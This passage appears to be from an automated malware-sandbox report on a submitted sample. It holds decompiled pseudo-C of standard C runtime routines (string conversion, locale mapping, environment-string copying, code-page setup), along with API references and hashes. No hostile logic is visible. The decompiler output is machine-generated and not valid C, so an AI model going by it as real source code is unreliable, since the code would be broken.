                                                                                                                                                                                                                                                    						_t60 = E010DA9E8(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                    						_t105 = _t60;
                                                                                                                                                                                                                                                    						if(_t105 == 0) {
                                                                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if((_a12 & 0x00000400) == 0) {
                                                                                                                                                                                                                                                    							_t96 = _t105 + _t105;
                                                                                                                                                                                                                                                    							_t87 = _t96 + 8;
                                                                                                                                                                                                                                                    							__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                    							asm("sbb eax, eax");
                                                                                                                                                                                                                                                    							__eflags = _t87 & _t60;
                                                                                                                                                                                                                                                    							if((_t87 & _t60) == 0) {
                                                                                                                                                                                                                                                    								_t101 = 0;
                                                                                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                                                                                    								L30:
                                                                                                                                                                                                                                                    								__eflags = _t101;
                                                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                                                    									L35:
                                                                                                                                                                                                                                                    									E010DA61A(_t101);
                                                                                                                                                                                                                                                    									goto L36;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t62 = E010DA9E8(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                                                                                                                                                                                                                    								__eflags = _t62;
                                                                                                                                                                                                                                                    								if(_t62 == 0) {
                                                                                                                                                                                                                                                    									goto L35;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                                    								__eflags = _a28;
                                                                                                                                                                                                                                                    								if(_a28 != 0) {
                                                                                                                                                                                                                                                    									_push(_a28);
                                                                                                                                                                                                                                                    									_push(_a24);
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                                                                                                                                                                                                                    								__eflags = _t105;
                                                                                                                                                                                                                                                    								if(_t105 != 0) {
                                                                                                                                                                                                                                                    									E010DA61A(_t101);
                                                                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									goto L35;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t90 = _t96 + 8;
                                                                                                                                                                                                                                                    							__eflags = _t96 - _t90;
                                                                                                                                                                                                                                                    							asm("sbb eax, eax");
                                                                                                                                                                                                                                                    							_t66 = _t60 & _t90;
                                                                                                                                                                                                                                                    							_t87 = _t96 + 8;
                                                                                                                                                                                                                                                    							__eflags = _t66 - 0x400;
                                                                                                                                                                                                                                                    							if(_t66 > 0x400) {
                                                                                                                                                                                                                                                    								__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                                    								_t101 = E010DBD19(_t87, _t66 & _t87);
                                                                                                                                                                                                                                                    								_pop(_t87);
                                                                                                                                                                                                                                                    								__eflags = _t101;
                                                                                                                                                                                                                                                    								if(_t101 == 0) {
                                                                                                                                                                                                                                                    									goto L35;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								 *_t101 = 0xdddd;
                                                                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                                                                    								_t101 =  &(_t101[4]);
                                                                                                                                                                                                                                                    								goto L30;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                    							asm("sbb eax, eax");
                                                                                                                                                                                                                                                    							E010DE270();
                                                                                                                                                                                                                                                    							_t101 = _t107;
                                                                                                                                                                                                                                                    							__eflags = _t101;
                                                                                                                                                                                                                                                    							if(_t101 == 0) {
                                                                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							 *_t101 = 0xcccc;
                                                                                                                                                                                                                                                    							goto L28;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t70 = _a28;
                                                                                                                                                                                                                                                    						if(_t70 == 0) {
                                                                                                                                                                                                                                                    							goto L37;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t125 = _t105 - _t70;
                                                                                                                                                                                                                                                    						if(_t105 > _t70) {
                                                                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t71 = E010DA9E8(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                                                                                                                                                                                                                    						_t105 = _t71;
                                                                                                                                                                                                                                                    						if(_t71 != 0) {
                                                                                                                                                                                                                                                    							goto L37;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                                                                                                                                    					_t72 = _t54 & _t95 + 0x00000008;
                                                                                                                                                                                                                                                    					_t85 = _t95 + 8;
                                                                                                                                                                                                                                                    					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                                                                                                                                                                                                                    						__eflags = _t95 - _t85;
                                                                                                                                                                                                                                                    						asm("sbb eax, eax");
                                                                                                                                                                                                                                                    						_t81 = E010DBD19(_t85, _t72 & _t85);
                                                                                                                                                                                                                                                    						_pop(_t85);
                                                                                                                                                                                                                                                    						__eflags = _t81;
                                                                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *_t81 = 0xdddd;
                                                                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                                                                    						_t81 =  &(_t81[4]);
                                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                                                                                                                                    					E010DE270();
                                                                                                                                                                                                                                                    					_t81 = _t107;
                                                                                                                                                                                                                                                    					if(_t81 == 0) {
                                                                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *_t81 = 0xcccc;
                                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}


























                                                                                                                                                                                                                                                    0x010dc88e
                                                                                                                                                                                                                                                    0x010dc88f
                                                                                                                                                                                                                                                    0x010dc890
                                                                                                                                                                                                                                                    0x010dc897
                                                                                                                                                                                                                                                    0x010dc89b
                                                                                                                                                                                                                                                    0x010dc89c
                                                                                                                                                                                                                                                    0x010dc8a2
                                                                                                                                                                                                                                                    0x010dc8a8
                                                                                                                                                                                                                                                    0x010dc8ae
                                                                                                                                                                                                                                                    0x010dc8b1
                                                                                                                                                                                                                                                    0x010dc8b1
                                                                                                                                                                                                                                                    0x010dc8b4
                                                                                                                                                                                                                                                    0x010dc8b6
                                                                                                                                                                                                                                                    0x010dc8b6
                                                                                                                                                                                                                                                    0x010dc8b4
                                                                                                                                                                                                                                                    0x010dc8b8
                                                                                                                                                                                                                                                    0x010dc8bd
                                                                                                                                                                                                                                                    0x010dc8c4
                                                                                                                                                                                                                                                    0x010dc8c7
                                                                                                                                                                                                                                                    0x010dc8c7
                                                                                                                                                                                                                                                    0x010dc8e3
                                                                                                                                                                                                                                                    0x010dc8e9
                                                                                                                                                                                                                                                    0x010dc8ee
                                                                                                                                                                                                                                                    0x010dca81
                                                                                                                                                                                                                                                    0x010dca94
                                                                                                                                                                                                                                                    0x010dc8f4
                                                                                                                                                                                                                                                    0x010dc8f4
                                                                                                                                                                                                                                                    0x010dc8f7
                                                                                                                                                                                                                                                    0x010dc8fc
                                                                                                                                                                                                                                                    0x010dc900
                                                                                                                                                                                                                                                    0x010dc954
                                                                                                                                                                                                                                                    0x010dc954
                                                                                                                                                                                                                                                    0x010dc956
                                                                                                                                                                                                                                                    0x010dc958
                                                                                                                                                                                                                                                    0x010dca76
                                                                                                                                                                                                                                                    0x010dca76
                                                                                                                                                                                                                                                    0x010dca78
                                                                                                                                                                                                                                                    0x010dca79
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dca7f
                                                                                                                                                                                                                                                    0x010dc969
                                                                                                                                                                                                                                                    0x010dc96f
                                                                                                                                                                                                                                                    0x010dc971
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dc977
                                                                                                                                                                                                                                                    0x010dc989
                                                                                                                                                                                                                                                    0x010dc98e
                                                                                                                                                                                                                                                    0x010dc992
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dc99f
                                                                                                                                                                                                                                                    0x010dc9d9
                                                                                                                                                                                                                                                    0x010dc9dc
                                                                                                                                                                                                                                                    0x010dc9df
                                                                                                                                                                                                                                                    0x010dc9e1
                                                                                                                                                                                                                                                    0x010dc9e3
                                                                                                                                                                                                                                                    0x010dc9e5
                                                                                                                                                                                                                                                    0x010dca31
                                                                                                                                                                                                                                                    0x010dca31
                                                                                                                                                                                                                                                    0x010dca33
                                                                                                                                                                                                                                                    0x010dca33
                                                                                                                                                                                                                                                    0x010dca35
                                                                                                                                                                                                                                                    0x010dca6f
                                                                                                                                                                                                                                                    0x010dca70
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dca75
                                                                                                                                                                                                                                                    0x010dca49
                                                                                                                                                                                                                                                    0x010dca4e
                                                                                                                                                                                                                                                    0x010dca50
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dca54
                                                                                                                                                                                                                                                    0x010dca55
                                                                                                                                                                                                                                                    0x010dca56
                                                                                                                                                                                                                                                    0x010dca59
                                                                                                                                                                                                                                                    0x010dca95
                                                                                                                                                                                                                                                    0x010dca98
                                                                                                                                                                                                                                                    0x010dca5b
                                                                                                                                                                                                                                                    0x010dca5b
                                                                                                                                                                                                                                                    0x010dca5c
                                                                                                                                                                                                                                                    0x010dca5c
                                                                                                                                                                                                                                                    0x010dca69
                                                                                                                                                                                                                                                    0x010dca6b
                                                                                                                                                                                                                                                    0x010dca6d
                                                                                                                                                                                                                                                    0x010dca9e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dca6d
                                                                                                                                                                                                                                                    0x010dc9e7
                                                                                                                                                                                                                                                    0x010dc9ea
                                                                                                                                                                                                                                                    0x010dc9ec
                                                                                                                                                                                                                                                    0x010dc9ee
                                                                                                                                                                                                                                                    0x010dc9f0
                                                                                                                                                                                                                                                    0x010dc9f3
                                                                                                                                                                                                                                                    0x010dc9f8
                                                                                                                                                                                                                                                    0x010dca13
                                                                                                                                                                                                                                                    0x010dca15
                                                                                                                                                                                                                                                    0x010dca1f
                                                                                                                                                                                                                                                    0x010dca21
                                                                                                                                                                                                                                                    0x010dca22
                                                                                                                                                                                                                                                    0x010dca24
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dca26
                                                                                                                                                                                                                                                    0x010dca2c
                                                                                                                                                                                                                                                    0x010dca2c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dca2c
                                                                                                                                                                                                                                                    0x010dc9fa
                                                                                                                                                                                                                                                    0x010dc9fc
                                                                                                                                                                                                                                                    0x010dca00
                                                                                                                                                                                                                                                    0x010dca05
                                                                                                                                                                                                                                                    0x010dca07
                                                                                                                                                                                                                                                    0x010dca09
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dca0b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dca0b
                                                                                                                                                                                                                                                    0x010dc9a1
                                                                                                                                                                                                                                                    0x010dc9a6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dc9ac
                                                                                                                                                                                                                                                    0x010dc9ae
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dc9c5
                                                                                                                                                                                                                                                    0x010dc9ca
                                                                                                                                                                                                                                                    0x010dc9ce
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dc9d4
                                                                                                                                                                                                                                                    0x010dc907
                                                                                                                                                                                                                                                    0x010dc909
                                                                                                                                                                                                                                                    0x010dc90b
                                                                                                                                                                                                                                                    0x010dc913
                                                                                                                                                                                                                                                    0x010dc932
                                                                                                                                                                                                                                                    0x010dc934
                                                                                                                                                                                                                                                    0x010dc93e
                                                                                                                                                                                                                                                    0x010dc940
                                                                                                                                                                                                                                                    0x010dc941
                                                                                                                                                                                                                                                    0x010dc943
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dc949
                                                                                                                                                                                                                                                    0x010dc94f
                                                                                                                                                                                                                                                    0x010dc94f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dc94f
                                                                                                                                                                                                                                                    0x010dc917
                                                                                                                                                                                                                                                    0x010dc91b
                                                                                                                                                                                                                                                    0x010dc920
                                                                                                                                                                                                                                                    0x010dc924
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dc92a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dc92a

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,010DCADA,?,?,00000000), ref: 010DC8E3
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 010DC91B
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,010DCADA,?,?,00000000,?,?,?), ref: 010DC969
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 010DCA00
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,010DCADA,?,?,00000000,?), ref: 010DCA63
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 010DCA70
                                                                                                                                                                                                                                                      • Part of subcall function 010DBD19: RtlAllocateHeap.NTDLL(00000000,?,?,?,010DA5A1,00000000), ref: 010DBD4B
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 010DCA79
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 010DCA9E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3864826663-0
                                                                                                                                                                                                                                                    • Opcode ID: 570ac14a7cf4ffb0d6fc26e564daf0145007391dce614ed96a2a23aad6f642f6
                                                                                                                                                                                                                                                    • Instruction ID: 5c99d3f81bf09ae6ab2075fa0806e809ecc6f9fa77029fd387f7dda7231ac283
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 570ac14a7cf4ffb0d6fc26e564daf0145007391dce614ed96a2a23aad6f642f6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF51D072600316AFFB25CEA8CD41EBE7BAAEB44654F15466DFD84DB180EB34DC40C651
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32 ref: 010DAA3B
                                                                                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 010DAA59
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                                                                                    • String ID: LCMapStringEx
                                                                                                                                                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                                                                                                                                                    • Opcode ID: fdcdab43824a90547c0ba946f26339b7a20b83318adc102c535ec88e33f85bbf
                                                                                                                                                                                                                                                    • Instruction ID: bb66a995980be00550ae8ffab42e54281b55f76a315bea498a53eb91c2b79cd0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdcdab43824a90547c0ba946f26339b7a20b83318adc102c535ec88e33f85bbf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD011332601219FBCF16AFA5DD01EEE3FA2EF18710F014158FE1426160C7768970EB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010E1D19(void* __ecx) {
                                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                                    				WCHAR* _t19;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t14 = __ecx;
                                                                                                                                                                                                                                                    				_t19 = GetEnvironmentStringsW();
                                                                                                                                                                                                                                                    				if(_t19 != 0) {
                                                                                                                                                                                                                                                    					_t12 = (E010E1CE2(_t19) - _t19 >> 1) + (E010E1CE2(_t19) - _t19 >> 1);
                                                                                                                                                                                                                                                    					_t6 = E010DBD19(_t14, (E010E1CE2(_t19) - _t19 >> 1) + (E010E1CE2(_t19) - _t19 >> 1)); // executed
                                                                                                                                                                                                                                                    					_t18 = _t6;
                                                                                                                                                                                                                                                    					if(_t18 != 0) {
                                                                                                                                                                                                                                                    						E010DEAF0(_t18, _t19, _t12);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					E010DA6DA(0);
                                                                                                                                                                                                                                                    					FreeEnvironmentStringsW(_t19);
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t18 = 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t18;
                                                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                                                    0x010e1d19
                                                                                                                                                                                                                                                    0x010e1d23
                                                                                                                                                                                                                                                    0x010e1d27
                                                                                                                                                                                                                                                    0x010e1d38
                                                                                                                                                                                                                                                    0x010e1d3c
                                                                                                                                                                                                                                                    0x010e1d41
                                                                                                                                                                                                                                                    0x010e1d47
                                                                                                                                                                                                                                                    0x010e1d4c
                                                                                                                                                                                                                                                    0x010e1d51
                                                                                                                                                                                                                                                    0x010e1d56
                                                                                                                                                                                                                                                    0x010e1d5d
                                                                                                                                                                                                                                                    0x010e1d29
                                                                                                                                                                                                                                                    0x010e1d29
                                                                                                                                                                                                                                                    0x010e1d29
                                                                                                                                                                                                                                                    0x010e1d68

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 010E1D1D
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010E1D56
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 010E1D5D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentStrings$Free_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2716640707-0
                                                                                                                                                                                                                                                    • Opcode ID: 2a76c8a6b723587f21fa327b8d780b20d44a3322d4739dd155a25960ae6dad95
                                                                                                                                                                                                                                                    • Instruction ID: e1cd11b1ea8c5727025a9ba9646cda87cb617c6d458b157d12c4ac281a2c1e06
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a76c8a6b723587f21fa327b8d780b20d44a3322d4739dd155a25960ae6dad95
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71E06537108622AA9122362BBC8CAFF2B99DFD25B57250155F5C487141AE76990641B1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 118 10db225-10db259 GetCPInfo 119 10db34f-10db35c 118->119 120 10db25f 118->120 122 10db362-10db372 119->122 121 10db261-10db26b 120->121 121->121 123 10db26d-10db280 121->123 124 10db37e-10db385 122->124 125 10db374-10db37c 122->125 126 10db2a1-10db2a3 123->126 128 10db395 124->128 129 10db387-10db38e 124->129 127 10db391-10db393 125->127 131 10db2a5-10db2dc call 10da4fd call 10dcaa6 126->131 132 10db282-10db289 126->132 130 10db397-10db3a6 127->130 128->130 129->127 130->122 133 10db3a8-10db3b8 call 10ddc5f 130->133 143 10db2e1-10db30c call 10dcaa6 131->143 134 10db298-10db29a 132->134 137 10db29c-10db29f 134->137 138 10db28b-10db28d 134->138 137->126 138->137 141 10db28f-10db297 138->141 141->134 146 10db30e-10db318 143->146 147 10db328-10db32a 146->147 148 10db31a-10db326 146->148 150 10db32c-10db331 147->150 151 10db341 147->151 149 10db338-10db33f 148->149 152 10db348-10db34b 149->152 150->149 151->152 152->146 153 10db34d 152->153 153->133
                                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                                    			E010DB225(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				char _v264;
                                                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                                                    				char _v776;
                                                                                                                                                                                                                                                    				char _v1800;
                                                                                                                                                                                                                                                    				char _v1814;
                                                                                                                                                                                                                                                    				struct _cpinfo _v1820;
                                                                                                                                                                                                                                                    				intOrPtr _v1824;
                                                                                                                                                                                                                                                    				signed int _v1828;
                                                                                                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                                                    				signed int _t68;
                                                                                                                                                                                                                                                    				intOrPtr _t69;
                                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                                    				char _t73;
                                                                                                                                                                                                                                                    				char _t74;
                                                                                                                                                                                                                                                    				signed char _t75;
                                                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                                                    				signed char _t86;
                                                                                                                                                                                                                                                    				char _t87;
                                                                                                                                                                                                                                                    				char _t90;
                                                                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                                                                    				signed int _t95;
                                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                                    				char* _t97;
                                                                                                                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                                                                                                                    				signed int _t102;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t95 = __edx;
                                                                                                                                                                                                                                                    				_t63 =  *0x116dd74; // 0x2e3e64ca
                                                                                                                                                                                                                                                    				_v8 = _t63 ^ _t102;
                                                                                                                                                                                                                                                    				_t101 = _a4;
                                                                                                                                                                                                                                                    				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
                                                                                                                                                                                                                                                    					_t96 = _t101 + 0x119;
                                                                                                                                                                                                                                                    					_t90 = 0;
                                                                                                                                                                                                                                                    					_t67 = 0xffffff9f;
                                                                                                                                                                                                                                                    					_t68 = _t67 - _t96;
                                                                                                                                                                                                                                                    					__eflags = _t68;
                                                                                                                                                                                                                                                    					_v1828 = _t68;
                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                    						_t97 = _t96 + _t90;
                                                                                                                                                                                                                                                    						_t69 = _t68 + _t97;
                                                                                                                                                                                                                                                    						_v1824 = _t69;
                                                                                                                                                                                                                                                    						__eflags = _t69 + 0x20 - 0x19;
                                                                                                                                                                                                                                                    						if(_t69 + 0x20 > 0x19) {
                                                                                                                                                                                                                                                    							__eflags = _v1824 - 0x19;
                                                                                                                                                                                                                                                    							if(_v1824 > 0x19) {
                                                                                                                                                                                                                                                    								 *_t97 = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_t72 = _t101 + _t90;
                                                                                                                                                                                                                                                    								_t57 = _t72 + 0x19;
                                                                                                                                                                                                                                                    								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
                                                                                                                                                                                                                                                    								__eflags =  *_t57;
                                                                                                                                                                                                                                                    								_t59 = _t90 - 0x20; // -32
                                                                                                                                                                                                                                                    								_t73 = _t59;
                                                                                                                                                                                                                                                    								goto L24;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
                                                                                                                                                                                                                                                    							_t54 = _t90 + 0x20; // 0x20
                                                                                                                                                                                                                                                    							_t73 = _t54;
                                                                                                                                                                                                                                                    							L24:
                                                                                                                                                                                                                                                    							 *_t97 = _t73;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t68 = _v1828;
                                                                                                                                                                                                                                                    						_t96 = _t101 + 0x119;
                                                                                                                                                                                                                                                    						_t90 = _t90 + 1;
                                                                                                                                                                                                                                                    						__eflags = _t90 - 0x100;
                                                                                                                                                                                                                                                    					} while (_t90 < 0x100);
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t74 = 0;
                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                    						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
                                                                                                                                                                                                                                                    						_t74 = _t74 + 1;
                                                                                                                                                                                                                                                    					} while (_t74 < 0x100);
                                                                                                                                                                                                                                                    					_t75 = _v1814;
